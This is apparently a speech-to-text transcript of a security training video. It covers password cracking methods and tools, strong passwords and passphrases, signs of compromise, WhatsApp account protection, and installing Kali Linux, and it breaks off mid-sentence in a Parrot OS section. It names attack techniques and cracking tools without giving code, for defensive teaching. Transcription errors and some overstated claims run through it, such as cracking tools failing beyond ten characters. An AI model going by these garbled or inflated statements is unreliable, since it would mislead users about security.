the hashes match file Integrity checks are valid and data corruption is avoided hash functions will always give the same output for the same input irrespective of the iteration parameters it also helps in ensuring that the data hasn't been tampered with on route to the receiver of the message passwords are by far the most common type of user Authentication they are popular because the theory makes perfect sense to individuals and is reasonably simple to implement for Developers on the other hand poorly constructed passwords can pose security flaws a well-designed password-based authentication process does not save the user's actual password this would make it far too simple for a hacker or a malevolent Insider to access all of the system's user accounts in this video you will learn how to crack passwords and simultaneously try to make your passwords as Brute Force resistant as possible let's take a look at the topics to be covered today we start by learning about what is password cracking in general next we take a look at the different techniques of password cracking that hackers use in order to generate user credentials for hacking moving on we take a look at the multiple tools that hackers can use to generate these hashes and the passwords finally we take a look at the steps and the guidelines that users can follow to prevent their passwords from being cracked let's start by giving a basic idea about password cracking password cracking is the process of identifying an unknown password to a computer or a network resource using a program code it can also assist a threat actor in gaining illegal access to resources malicious actors can engage in various criminal activities with the information obtained through password tracking the procedure might entail comparing a set of words to guest credentials or using an algorithm to guess the password repeatedly password tracking can be done for several reasons but the most malicious reason is in order to gain unauthorized access to a computer without the owner's awareness this results in cyber crime such as stealing passwords for the purpose of accessing banking information other non-malicious reasons for password cracking occur when someone has misplaced or forgotten a password another example of non malicious password cracking may take place if a system administrator is conducting tests on password strength as a form of security test this enables so that the hacker cannot easily access protected systems the best way that users can protect their passwords from cracking is to ensure that they choose strong passwords typically passwords must contain a combination of mixed case random letters digits and symbols strong passwords should never be actual words in addition strong passwords are at least 8 characters long in many password protected applications users are notified of the strength of the password they have chosen upon entering it the user can then modify it and strengthen the password based on the indications of its strength now that we understand the basics of password cracking let's go to the basic techniques hackers use to retrieve passwords from General victims asking the customer for their password is simple approach to hacking a phishing email directs the unwarya reader to a counterfeit login page linked with whatever service the hacker wants to access generally by demanding the user fix some critical security flaw or Aid in a database reset that page then captures their password which the hacker can subsequently exploit for their own purpose social engineering influences the victim to get personal information such as bank account numbers or passwords the strategy is popular among hackers because they realize that humans are the gateway to vital credentials and information through social engineering the employee tried and threw tactics to exploit and influence age-old human Tendencies rather than devising novel means to breach secure and Advanced Technologies it has been demonstrated that many firms either lack adequate security or are overly friendly and trustworthy even they should not be they allow granting access to critical facilities based on a uniform or a sob story a hacker searches a password dictionary for the correct password in the case of a dictionary attack password dictionaries cover many themes and of mixture of topics such as politics movies and music groups users failure to create a strong password is why this approach efficiently cracks passwords till today simply said this assault employs the same terms that many individuals use as passwords a hacker can compare the password hash obtained to hashes of the password dictionaries to find the correct plain text password now that the passwords have been hashed the hackers attempt to achieve authentication by breaking the password hash they accomplish this by applying a rainbow table which is a set of pre-computed hashes of portable password combinations hackers can use the rainbow table to crack the hash resulting in guessing your password as a result it retrieves the password hash from the system and eliminates any need to break it furthermore it does not necessitate the discovery of the password itself the breach is accomplished if the hash matches in a Brute Force assault the attacker attempts multiple password combinations until the correct one is identified the attacker uses software to automate this process and run exhaustive password combination in a substantially shorter length of time with the growth of hardware and technology in recent years such programs have been invigorated it won't be quick if your password is more than a few characters lengthy but it will eventually reveal your password boot Force assaults can be sped up by throwing more processing resources at them with so many different techniques coming together to correct passwords none of them are useful without the right tools there are a pressure of scripts and Snippets of code that can retrieve passwords from either encrypted storage or from the hash digest let's go through some of these tools Kane and Abel is a password recovery tool for Microsoft operating systems it allows easy recovery of various kinds of passwords by sniffing the network cracking encrypted passwords using dictionary brute force and crypt analysis attacks recording VoIP conversations decoding scrabber passwords recovering wireless network Keys Etc are some of the other features of Cain enable the latest version is faster and contains a lot of new features like ARP poison routing which enables sniffing on Switched lens and man in the middle attacks the sniffer in this version can also analyze encrypted protocols such as ssh1 and https while containing filters to capture credentials from a wide range of authentication mechanisms it also ships routing protocol authentication monitors and Route extractors dictionary and boot first crackers are also present along with common hashing algorithms and several specific authentications password hash calculators and other features John the Ripper is a password cracking application that was first released in 1996 for Unix based computers it was created to evaluate password strength Brute Force encrypted hash passwords and break passwords using dictionary attacks it can use dictionary attacks rainbow tables and other attacks depending on the target type Rainbow Crack is a password tracking application that uses time memory trade-off algorithm to crack password hashes with rainbow tables rainbow tables make password cracking more easier and faster than traditional Brute Force attacks it is like a dictionary containing nearly every possible password and the pre-calculated hashes creating this kind of dictionary takes much more time than cracking a single hash but after that you can use the same dictionary over and over again this procedure might take a long time however once the table is ready it can break passwords far quicker than Brute Force methods with so many tools ready to NAB our passwords there are certain set of rules users can follow to protect their credentials from being compromised let's cover some of these guidelines longer passwords are required making the Brute Force mechanism tougher to implement longer passwords and pass phrases have been demonstrated to boost security significantly however it is still critical to avoid lengthy passwords that have previously been hacked or that feature often in cracking dictionaries this password policy encourages users to establish passwords that do not contain personal information as previously said most users create passwords utilizing personal information such as Hobbies nicknames pet or family member names Etc if a hacker has access to personal information about a specific user for example via social media they will test password combinations based on that knowledge password regulations should compel users to distinguish between security and convenience users should be prohibited from using the same password for all services password sharing between users including those who work in the same department or use the same equipment should be avoided a single breached password doesn't affect your other accounts with this policy some password regulations necessitate the creation of a passphrase rather than a password while passphrases serve the same objective the length make them more difficult to break in addition to letters a good pass should include numbers and symbols passwords may be easier for users to remember than passphrases however the latter is much more breach resistant two-factor authentication or 2fa can help secure an online account or even a smartphone 2fa does this by asking the user to provide two forms of information a password or a person identification PIN and a code texted to the user smartphone or a fingerprint before accessing whatever is secured this helps discourage unauthorized entries to an account without the original owner's permission at this point you may wonder why you need a strong password in the first place even if most websites are safe there is still a danger that someone will try to access or exploit your information a strong password is among the most effective ways to protect your accounts and personal information from hackers you should follow certain rules and guidelines while creating a strong password password managers are also recommended to help remember the created passwords for convenience of usage with that being said let's take a look at the topics we are covering today we start by learning about the state of password cracking in today's world and why creating strong passwords is an absolute must for every account next we will look at some guidelines and rules that help strengthen passwords and make password cracking a daunting task for hackers moving on we understand why past faces have gone in popularity and are being recommended for credential protection over traditional passwords and finally we take a look at how password managers help alleviate the problem of creating and remembering complex passwords along with other critical personal information let's start by learning about why strong passwords have become an absolute necessity one of the most common ways that hackers break into computers is by guessing passwords simple and commonly used passwords enable Intruders to easily gain access and control a Computing device conversely a password that is difficult to guess makes it prohibitively difficult for common hackers to break into a machine and will force them to look for another Target the more difficult the password the lower the likelihood that once computer will fall victim to an unwanted intrusion many individuals opt to tie their websites to something they can readily recall to generally easy memorable combos however this does not make the password unique in fact it's the reverse passwords are handled by 53 percent of individuals using their Recollections and memory with modern computational standards simple passwords take seconds and a couple of minutes at worst to be completely brute forced according to Global surveys more than 60 percent of people use the same passwords for their personal and job applications while this may allow the user never to forget the password it makes a single point of failure the only pin to drop if one of the accounts gets breached all subsequent accounts are as good as hacked to further elaborate on how you can create strong passwords let's go through some of the guidelines let's go through some do's and don'ts to understand how to create new passwords for accounts it is recommended to keep the password length at least 12 characters to ensure brute forcing to be difficult a combination of upper and lowercase alphabets is an absolute necessity when creating strong passwords it is also recommended to use numerix along with those alphabets to create a complicated password finally special characters help in making a password much more Brute Force assistant than any number of alphabets or letters can make moving over to the down section it's absolutely not recommended to keep Simple dictionary terms such as computer or even the word password as your credential because those are very easy to be brute forced and are usually present in majority of the dictionary attack word list similarly changing a single alphabet or a single character in a dictionary word does not make it boot forces instant considering there are already algorithms present that can counter this tactic using the same character multiple times in a password also reduces the strength and makes it easier to crack for hackers apart from using single characters multiple times following patterns that are present on this traditional English keyboard such as ewerty or the line below the main alphabet such as the zxcvbnm ETC make it easier to guess since these are once again common combinations that are present in word list already finally the most important part being not using personal information such as birthdays addresses and other important information in the passwords more often than not if a hacker is trying to break into your account there has been some amount of research done be it via social media or any other medium if they have already this information present with them breaking into account becomes all the more easier now that you understand how to create strong password look at how passphrases have become prevalent as a replacement for plain text passwords a passphrase is a sentence like string of words used for authentication that is longer than a traditional password easy to remember and difficult to crack typical passwords range on an average from 8 to 16 characters while past phrases can reach up to 100 characters or more using a long fast phrase instead of a short password to create a digital signature is one of the many ways that users can strengthen the security of their data devices and accounts the longer a passphrase is the more likely a user is to incorporate bits of entropy of factors that make it less predictable to potential attackers as more websites applications and services increase the user security requirements apostrates is the fast and easy way to meet these criterias let's take a look at some of the advantages that passphrases have over common passwords passwords are simpler to remember than just a random assortment of symbols and characters it's easier to comprehend a line from your favorite song or a quotation than a short but difficult password passwords are reasonably easy for humans and robots to guess or crack online thieves have also Advanced and created Cutting Edge hacking tools to crack even the most complex passwords passphrases are nearly hard to crack since most efficient password tracking programs fail at approximately 10 characters as a result even the most sophisticated cracking tool will be unable to guess brute force or pre-compute these passwords complies with password setting rules with ease are passphrases the usage of punctuation and upper and lowercase passwords satisfy the password complexity criteria most operating systems and apps support pass phases freezes of up to 1.7 characters are permitted on all major operating systems including Windows Linux and Mac as a result for optimal protection you can use lengthier past reasons but when creating a strong password the major problem people come across is remembering these passwords or the past phrases this is where you can find a use for a password manager when you establish accounts or change passwords password managers generate new strong passwords and they keep all of them in one place protected by a single strong master password if you maintain your master password the manager will retain everything else including your username and passphrases and fill them in for you whenever you sign on to a website or app on your computer or phone there is no good memory needed for this implies that everyone may use the most recent suggestions for strong passwords such as extended phrases symbols grammar and capitalization password managers enable consumers to write a single master password and automatically fill each website with their own unique set of credentials and not just passwords credit card information may be stored securely with several password managers some others make multi-factor authentication or use a second test such as answering a question once the correct password is input which is a simple and effective solution to verify legitimate login inputs among the global players in password managers services like bitwarden keep us and Dashlane have been running for years now and are very worthy recommendations if you want to get started with password management now that we understand what is hacking let's take a look at some points to know whether our system is already high or not the first point regarding how to check whether a system is hacked or not can be cases where the system security is Switched Off by unknown means and it is not visible to the user this is one of the most primary checkpoint to know if our system is hacked or not next point to check whether a system is hacked or not would be frequent antivirus software failures which are due to the interference from hacking attempts performed by a professional hacker or a cyber Criminal then we also face problems regarding systems reaction speed which is affected due to the execution of unknown applications in the background of the system which also affects the hardware resources in the device next we also face problems regarding passwords which are no longer working or are changed without a user's Intervention which might indicate that there was some unknown hacking activity that took place in our account let's take a look at some more points regarding the topic there are often cases when the system's cursor move on its own and perform tasks indicating that the system is being used by someone else using an illegal hacking method there are also cases when we often see files and folders being created in the stores disk on the system which is unknown to us to better understand the points regarding how to identify whether our system is hacked or not let's take a look then let's start with the first point if we want to check whether a system is hacked or not the first point would be to choose the settings option and using privacy and security and moving on to the Windows security this option that is available on our system allows us to see various protection applications that are available on the system if we see any problem regarding any one of them for example apps and browser control in my system it says there's a problem with it which might be due to hacking attempts that was done on my system now let's take a look at the other option how we can check whether a system is hacked or not that would be checking the antivirus software that is installed in our system if you face problems regarding that this might be the issue according to my antivirus software it says my computer is at risk this might be due to the interference from cybercriminal or a hacker while using different illegal softwares during its hacking attempt then there are also cases where we see there are unknown programs being executed in the background of a system which we can take a look using the task manager software using the task manager we can take a look at each and every application that is being executed in the system and see the origin if we find any unknown program or application we can assume that it might be due to a hacking attempt moving on if we want to check further whether our system is hacked or not we can check for files or folders that are being created or known to us for example this unknown folder which contains some security details that are unknown to me this might be also due to a hacking attempt by a hacker or a cyber Criminal then there are also cases when the system's cursor move on its own and perform tasks that are not initiated by us and performs copying of different folders or data from one file to other this is due to a hacking attempt that was done on a system and the hacker has taken control of a system then there are also cases regarding login issues or password problem for example if I want to access into my account and there's a problem with the password it might be due to the attempt of hacking into my account by a professional hacker seems like there's a problem with the username which means there was a hacking attempt by a professional hacker we can further check hacking attempts by accessing a web browser and checking whether there's some extra add-ons or unknown add-ons that wasn't installed by us this might also indicate a hacking attempt on the system now that we are clear about how to check whether a system is hacked or not let's take a look at some of the counter measure against hacking let's begin the first point regarding how to avoid hacking is do regular manual Security checks and keep the system security updated using certified antivirus softwares is a basic counter measure against hacking attempts and if possible visit only secure website for surfing on the Internet or use VPN or other Internet Security applications to mask your systems Network to avoid any hacking attempts for the device then we have avoid clicking on random web pop-ups and ads to avoid Hackers from getting into a system and accessing a device data and lastly use strong passwords or complex passwords for your login details applying these counter measures we can avoid hacking to a certain extent the concept of instant messaging crossed into the mainstream in the 1990s allowing friends acquaintances colleagues and like-minded thinkers from all over the world to connect in real time since then instant messaging has revolutionized how we communicate and today over a billion people are signed up for at least one messaging app the present instant messaging experience is seamless and it intuitively integrates features like video photos voice e-commerce and gaming with plain old messaging among these apps WhatsApp has comfortably found its place among the most popular messaging platforms like everyone associated with the internet a matter of security is never far away considering the huge user base of this messaging app hackers are always on the lookout for compromised accounts to grab today we are going to cover some of the ways we can protect our WhatsApp account from falling into malicious hands we start by learning about the importance of security when it comes to WhatsApp and instant messaging apps in general next we cover some of the most important steps that should be followed in order to protect our WhatsApp accounts from hackers finally we learn what we should do when a WhatsApp account gets compromised let's start by learning why we need to focus on the safety of WhatsApp in the year of 2020 the big news was about Amazon CEO Jeff Bezos and his phone being hacked by Saudi Arabia a report coming from the guardian suggested that Bezos phone was hacked via a video file sent on WhatsApp the report said that Bezos mobile phone was hacked by Saudi Arabian prince in the year 2018 and gigabytes worth of data was stolen from the device well there are some issues being raised about the report which states with the medium to high confidence that Jeff Bezos phone was hacked it does raise a security fear for regular users after all if the phone of one of the world's most powerful men can be hacked the same can happen to any one of us as well when it comes to regular users we exchange messages with a loved ones regarding a paradigm of topics the information which may seem trivial initially can later function as ammunition for a campaign regarding identity theft basic information like preferred Banks occasional dining places can go a long way in Social Engineering attacks further increasing the need for secure messaging habits WhatsApp uses end-to-end encryption to protect all communication on its platform these encryption keys not only make it impossible to decrypt messages but they also prevent third parties and even WhatsApp from accessing messages or calls but not entirely although end-to-end encryption makes WhatsApp more secure than other communication apps no app is 100 safe to use like any application or digital device WhatsApp is often targeted by Bad actors it also has access to your contacts and tracks where and how long you use it putting your privacy and personal information at risk we all have access to our cell phones so it's no surprise that SMS two-factor authentication is one of the most widespread types of MFA available you don't need any apps or digital keys and it's not tied to a specific ecosystem unfortunately it's also not a secure multi-factor authentication method the nature of SMS itself opens up your organization to a host of risks hackers may have many ways to leverage SMS to find a way into your accounts and Network be it via support SIM cards or message hijacking WhatsApp to fa using SMS isn't a foolproof solution now that we understand the variety of reasons why WhatsApp needs extra security let's go through some of the ways we can achieve this it is more than probable that one fine day you might receive a WhatsApp message or even an SMS that reads that your order is delayed please check its data here or your account is locked and please unlock it here or even some tempting messages like win free 3G and movie tickets here some of them may sound intimidating and some of them may be lucrative but they all have one purpose to trick you into clicking that link and once you do that it's already over it will install malware on your phone and you won't have a clue about it only when you start noticing that your phone bills are abnormally high or your bank account has been used without your permission the realization will Dawn upon you that something is wrong with your phone but by then it may be too late WhatsApp in itself provides various privacy options to users the messaging platform provides users with option to choose who they want to share with their profile photo status and other details with it's a good idea to change the settings to contacts only this means only phone numbers that are saved on your smartphone will be able to see your profile photo status phone number and auto delete status as well make sure you enable the option to lock the screen every time WhatsApp is closed this will ensure no one else but you can open your WhatsApp account just head to the settings menu privacy and select the screen lock option you will then need to register your fingerprint after the process is completed you will have to scan your fingerprint every time you open the WhatsApp app this adds an extra layer of security the two-step verification works as an extra layer of security and helps WhatsApp users to protect the otps and documents shared through WhatsApp it's very easy to set up a PIN to activate a two-step verification users have to enter it periodically once it is activated WhatsApp will sometimes keep asking users to enter this six digit passcode users cannot disable this without disabling the two-step verification feature altogether in case users do not provide WhatsApp with an email ID and want to disable two-step verification then the number will be permitted to re-verify on WhatsApp without the passcode after 7 Days however the users will lose all pending messages upon re-verifying we often have the tendency to log into WhatsApp web at the office and then leave the account open on the desktop this habit can actually create problems for you someone else sitting on the same PC can access all your chats without you even realizing it it's a good practice to log out from WhatsApp before leaving the office it just takes a few seconds to log in again by just scanning the code and you're done all WhatsApp users should ensure that the chats are end-to-end encrypted to verify that a chat is end-to-end encrypted open the chat tap on the name of the contact to open the contact info screen and then tap encryption to view the QR code and a 60 digit number WhatsApp end-to-end encryption ensures that only you and your contact can read the messages that are being exchanged and nobody in between not even WhatsApp with the necessary guidelines out of the way let us go through the recommended course of action should our WhatsApp accounts be compromised the first and most important thing that you need to do is report the issue to the WhatsApp support team for assistance make sure that you reach out to the support team through its help desk and Report the hacking attempt WhatsApp help center will take the shortest time to resolve your issue via email or within the app itself this will help you to take prompt legal action against the hackers if you can't access your email call the support team in some cases the support will deactivate your WhatsApp account and request you to reactivate it within 30 days if you don't want it to be deleted completely when someone compromises your WhatsApp account they can now send messages to your contacts stating that the company sent your verification code and gain access to the account that's why one of the first things you'll want to do is send a message to your friends and family letting them know that you've lost access to your account this action prevents further exploitation of your account and others another reason you'll want to let your contacts know you have no access to your WhatsApp account is that they may fish for personal information from your banking number to your email address hackers will cleverly attempt to gain as much access to your personal information as possible WhatsApp web is an extension of WhatsApp messenger over the web that facilitates easy synchronization of our smartphone and personal computer this is the biggest security threat that hackers can easily exploit to get into your personal data over WhatsApp therefore it is highly recommended that you use this WhatsApp feature carefully once you notice that your WhatsApp Messenger has been hacked go to your WhatsApp web and tap or click on the logout from all computers option this will deactivate all the web extensions of your account another unfortunate circumstances where the account recovery doesn't seem likely you can always ask WhatsApp support to delete your account permanently while far from the ideal solution it can act as a Fail-Safe option if you want to protect your personal data at any cost possible you can always open a new account later with the security issues mitigated it's no secret that the majority of our internet usage set the risk of being hacked be it via unsafe messaging applications or misconfigured operating systems counteract this void of digital security penetration testing has become the knob when it comes to vulnerability assessment Kali Linux is an operating system that has become a well-known weapon in this fight against hackers a Linux distribution that is made specifically for penetration testers Kali Linux has layers of features that we will be covering in today's lesson let's take a look at the topics to be covered in this video we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of car Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide finally we take a look at the multiple ways we can install Kali Linux to start a journey in the world of penetration testing let's start by learning about Kali Linux in general Kali Linux which is formerly known as backtrack Linux is an open source Linux distribution aimed at Advanced penetration testing and security auditing it contains several hundred tools that are targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering Kali Linux is a multiple platform solution accessible and freely available to Information Security Professionals and hobbyists among all the Linux distributions Kali Linux takes its routes from the Debian operating system Debian has been a highly dependable and stable distribution for many years providing a similarly strong Foundation to the Kali desktop while the operating system is capable of practically modifying every single part of our installation the networking components of Kali become disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of control to the most enthusiastic of users we did not get Kali Linux since the first day how did it come into existence let's take a look at some of its history Kali Linux is based on years of knowledge and experience in building penetration testing and operating systems during all these project lifelines there have been only a few different developers as the team has always been small the first project was called wapx which stands for white hat knopex as can be inferred from the name it was based on the nopics operating system as its underlying OS Opex had releases ranging from version 2.0 to 2.7 this made way for the next project which was known as wax or the long hand being white hat slacks the name change was because the base OS was changed from gnopics to slacks wax started at version 3 as a Nord at carrying on from mop X there was a similar OS being produced at the same time auditor security collection often being shorted to just auditor which was once again using gnopics its efforts were combined with wax to produce backtrack backtrack was based on slackware from version 1 to version 3 but switched to Ubuntu later on with version 4 to version 5. using the experience gained from all of this Kal Linux came after backtrack in 2013. Kali started off using Debian stable as the engine under the hood before moving to Debian testing when Kali Linux became a rolling operating system now that we understand the history and the purpose of Kali Linux let us learn a little more about its distinct features the latest version of Kali comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in backtrack developers have eliminated a great number of tools that either simply did not work which duplicated other tools that provided the same or similar functionality the Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external asset greatly reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cybercrime although penetration tools tend to be written in English the developers have ensured that Kali includes true multilingual support allowing more users to operate in their native language and locate the tools they need for the job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a stronghold over the configuration and the device in general since arm-based single board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive the development team knew that kali's arm support would need to be as robust as they could manage with fully working installations Kali Linux is available on a wide range of arm devices and has arm repositories integrated with the mainland distributions so the tools for arm are updated in conjunction with the rest of the distribution all this information is necessary for users to determine if Kali Linux is the correct choice for them if it is what are the ways that they can go forward with this installation and start the penetration testing Journey the first way to use Kali Linux is by launching the distribution in the live USB mode this can be achieved by downloading the installer image file or the ISO file from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB some people don't need to save their data permanently and a live USB is the perfect solution for such cases after the iso image is flashed the thumb drive can be used to boot a fully working installation of the operating system with the caviar that any changes made to the OS in this mode are not written permanently some cases allow persistent usage in live USBS but those require further configuration than normal situations but what if the user wants to store data permanently in the installed OS the best and the most reliable way to ensure this is the full-fledged hardness installation this will ensure the complete usage of the system's Hardware capabilities and will take into account the updates and the configurations being made to the OS this method is supposed to override any pre-existing operating system installed on the computer be it windows or any other variant of Linux the next alternative route for installing Kali Linux would be to use virtualization software such as VMware or virtualbox the software will be installed as a separate application on an already existing OS and Kali Linux can be run as an operating system in the same computer as a window the hardware requirements will be completely customizable starting with the allotted Ram to the virtual hard disk capacity the usage of both a host and guest operating system like car Linux allows users a safe environment to learn while not putting the systems at risk if you want to learn more about how one can go forward with this method we have a dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system you can find the link in the description box to get started with your very own virtual machine the final way to install Kali Linux is by using a dual boot system to put it in simple words the Kali Linux OS will not be overwriting any pre-installed operating system on a machine but will be installed alongside it when a computer boots up the user will get a choice to boot into either of these operating systems many people prefer to keep both the windows and Kali Linux installed so the distribution of work and recreational activities is also allotted effectively it gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system now for the convenience of explanation we're going to install Kali Linux today on a virtual machine software known as VMware VMware is able to run multiple operating systems on a single host machine which in our case is a Windows 10 system to get started with Kali Linux installation we have to go to the website to download an image file we go to get Kali and as you can see there are multiple platforms on which this operating system can be inverted as per our requirement we're going to go with the virtual machine section as you can see it is already recommended by the Developers this is the download button which will download a 64-bit ISO file we can download 32-bit but that is more necessary for hard metal machines or if you're going to use it for older devices which do not support 64-bit operating systems yet after clicking on the download button we can see we have a window archive which will have the ISO files for now we have downloaded the ISO file and it is already present with me so we can start working on the VMS side of things once the ISO file is downloaded we open up VMware Workstation go to file and we create a new virtual machine in these two options it is highly recommended to go with the typical setup rather than the custom one the custom is much more advanced and requires much more information from the user which is beneficial for developers and people who are well versed with virtualization software but from 90 of the cases typical setup will be enough here we can select the third option which will be I will install the operating system later and some operating systems we can use the ISO file here directly and VMware will install it for us but for right now in the case of Kali Linux the third option is always the safest color Linux is a Linux distribution so we can select Linux over here and the version as you can see here I have multiple versions such as the multiple kernels every distribution has of a parent distribution for example color Linux has Debian and there are other distributions which are based or forked from some parent distribution Colinas is based of Debian so we can go with the highest version of Debian which is the Debian 10.x 64-bit go on next we can write any such name we can write Kali Linux so that it will be easier to recognize the virtual machine among this list of virtual machine instances the location can be any location you decide to put by default it should be the documents folder but anywhere you put it will hold up all the information rig of the operating system all the files you download all the configurations you store everything will be stored in this particular location that you provide when we go next we are asked about the disk capacity this disk capacity will be all the storage that will be provided to your virtual machine of Cal Linux think of your Windows device if you have a one terabyte of hard drive you have the entirety of the hard disk to store data on how much data you give here you can only store up to that amount of data not to mention some amount of capacity will be taken up by the operating system itself to store its programs and applications for now we can give around let's say 15 GB of information or if a recommended size for type in is 20 you can just go ahead at 20 it depends on the user case if you are going to use it extensively you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests another option we get over here is storing virtual disk as a single file or storing them into multiple files as we already know this virtual machine run entirely on VMware sometimes when transferring these virtual machine instances let's say from a personal computer to a work computer you're going to need to copy up the entire folder that we had mentioned before over here instead all virtual machines have a portability feature now this portability feature is possible for all scenarios except it is much easier if the split the virtual disk into multiple files now even if this makes what porting virtual machines easier from either system to system or software to software let's say if you want to switch from VMware to virtualbox or vice versa the performance takes a small hit it's not huge but it's recommended to go with storing the virtual disk as a single file if you have no purposes of ever moving the virtual machine even if you do it's not a complete stop that it cannot be ported it's just easier when using multiple files but in order to get the best performance out with a virtual machine we can store it as a single file over here this is a summary of all the changes that we made and all the configurations that have been settled until now now at this point of time we have not provided the dot ISO file yet which is the installation file for the Kali Linux that we downloaded from this website as of right now we have only configured the settings of the virtual machine so we can press on finish and we have Kali Linux in the list now to make the changes further we press on edit virtual machine settings the memory is supposed to give the ram of the virtual machine the devices with ram of 8 GB odds below that giving high amount of ram will cause performance issues and the host system if the memory has some amount of free storage left let's say on idle storage my Windows machine takes about 2GB so I have 6 GB of memory to provide although if you provide all of the 6 GB it will be much more difficult for the host system to run everything properly so for this instance we can keep it as 2GB of memory for the virtual machine instance similarly we can use the number of processors and we can customize it according to our liking let's say if you want to use One processor but we want to use two different cores we can select them as well hard disk is pre-set up as the SCSI hard disk and it does not need to be changed for the installation of this operating system at all cdid DVD this is where the installation file comes you can think of the ISO file that we downloaded as a pen drive or a USB thumb drive which is necessary to install an operating system to provide this we're going to select use ISO image file we're going to click on browse go and go to downloads and select the Im so file over here select open and we can see it is already loaded up next in the network adapter it is recommended to use Nat this helps the virtual machine to draw the internet from the host machine settings if your host machine is connected to the internet then the virtual machine is connected as well there are some other options such as host only or custom segments or Lan segments but those are not necessary for installation rest of them are pretty standard which do not need any extra configuration and can be left as it is press OK and now we can power on this virtual machine in this screen we can choose how we want to proceed with the installation we have a start installer option over here so we're going to press enter on that you're going to wait for the things to load from the ISO file um the first step in the installation is choosing the language of the operating system for this we can go with English as standard this is a location this should be used for setting up the time and some of the internal settings which depend entirely on the location of the user so for this we're going to go with India configuring the keyboard it's always recommended to go with the American English first many people make a mistake of going with the Indian keyboard if it is possible and it provides a lot of issues later on so it's always prefer to go with the American English and if later we see some necessity of another keyboard dialect that is required we can install it later but for now we should always stick with American English as a basic at this point it's going to load the installation components from the dot ISO file it is a big file of 3.6 GB so it has a lot of components that need to be put into the virtual machine which can also be used to detect Hardware once the hardware and the network configuration is done by the ISO file we want to write a hostname for the system this hostname can be anything which is used to recognize this device on a local network or a lan cable let's say if we use the name Kali domain name you we can skip it for now it's not necessary as such for the installation this is the full name for the user let's say we can provide the name as simply learn as a full name next we're going to set up a username this username is going to be necessary to identify the user from its your root accounts and the subsequent below accounts for now we can give it as something as simply one two three foreign now we have to choose a password for the user now remember since this is the first user that is being added onto this newly installed operating system it needs to be a password for the administrator we can use whichever password we like over here and use the same password below and press on continue at this point it's going to detect on the components on which the operating system can be installed like here there are multiple options like the use entire disk use entire disk and setup lvm this entire disk and setup encrypted lvm for newcomers it is recommended to just use the first one since lvm encryption is something that we can learn afterwards when you are much more Hands-On with the Linux operating system for now we're going to use the use entire disk guided installation and press on continue when we set up the virtual machine on VMware we had set up a disk capacity that we gave a proper 20 GB that is the hardest which is being discovered here even though it is a virtual disk on VMware it acts as a normal hard disk on which an operating system can be installed so we select this one and press on continue here there is a multiple partition system all the operating systems that are installed have different components one is used for the keeping of the applications one for the files other for the RAM management and other things for newcomers it is always recommended to keep it in one partition and we're going to select that and press on continue this is just an overview of the partition it's going to make as you can see it has a primary partition of 20.4 GB and a logical partition of 1GB used for swap memory now these kind of naming can be confusing for people who are not well versed with Linux operating systems or in general virtualization but for now you can go ahead and press on continue as this will be fine we can press on finish partitioning and write changes to disk and continue it's just a confirmation page as you can see it showed that SCSI 3 is our virtual hard disk of 20 GPS capacity we write the changes to the disk we press yes and click on continue at this point the installation has started now this installation will take a while depending on the num amount of ram provided the processors provided and how quickly the performance of the system is being hampered by the host machine on quick assistance this will be rather quick while on the smaller ones this will take a while since this is going to take some time to install as it is being run on a virtual machine with only 2GB of RAM we're going to speed up this part of the video so we don't have to waste any more time just watching the progress bar now that our core installation is completed it's asking us to configure a package manager the work of a package manager on Linux operating system is similar to the Google Play Store on Android mobile devices and on the app store for the Apple devices it's an interface to install external applications which are not installed by default let's say for Google Chrome or any other browser which can be used to browse the internet at this point of time is ask us to select a network mirror we're going to select as yes and move forward with this next is going to ask us for a HTTP proxy which we can leave it as blank and press it as continue forward at this point of time it's looking for updates to the Kali Linux installation this will fetch the new builds from the Kali server so the installation is always updated to the latest version now that the package manager is configured we have the grub bootloader the grub is used for selecting the operating system while booting up its core functionality is to allow the operating system to be loaded correctly without any faults so at this point of time if it has installed the GRUB boot loader to your primary dive we can select this as yes and press continue remember the installation was conducted on dev SDA so we're going to select installation of the Guard loader on the same hard disk that we have configured we press this one and press continue so now the grub bootloader is being installed the grub is highly essential because it is it shows the motherboard where to start the operating system from even if the operating system is installed correctly and all the files are in correct order the absence of a bootloader will not be able to launch the OS properly as you can see the installation is finally complete so now we can press on continue and it's going to finalize the changes now you can see color Linux being booted up straight away it doesn't check for the ISO file anymore since the operating system is now installed onto the virtual hard disk storage that we had configured before here we're going to enter our username and password that we had set up before and we have the calendar system booted up and this is your home page we can see the installed applications over here which are being used for penetration testing by multiple security analysts worldwide foreign Linux and others can be installed using the APT package manager that we had configured we can see a full name over here and with this our installation of the Carly Linux is complete hey everyone it's no secret that the majority of our internet usage is at the risk of getting hacked be it via unsafe messaging applications or misconfigured operating systems to counteract this void of digital security penetration testing has become the norm when it comes to vulnerability assessment pirate security OS is an operating system that has become a well-known weapon in this fight against hackers while enough distribution more catered towards penetration distance specifically parent security has layers of features that we will be covering in today's lesson let's take a look at the topics for this video we start by learning about what valid security is then why it should be considered as a viable alternative next to Carl Linux or penetration testers next we take a look at the minimum system requirements necessary to obtain Optimum performance from an installation of parrot security moving on we learn about some unique features that make parrots Stand Out Among the multiple ethical hacking operating systems available on the market and finally we look at the multiple ways that parallel security OS can be installed be it on a single system or for portable media so let's start out by learning what parrot security is parrotos is a Debian based Linux distribution with an emphasis on security privacy and development it is built on debian's testing branch and uses a custom hard Linux kernel while being founded in 2013. parrot security contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering it has become a multi-platform solution accessible and freely available to Information Security Professionals and hobbies it features a distant forensics mode that does not Mount any of the system hard disks or partitions and has no influence in the host system making it more stealthy than regular mode this mode is used with the host system when there is a need for executing forensic procedures in software development a rolling release is a paradigm in which software upgrades are rolled out 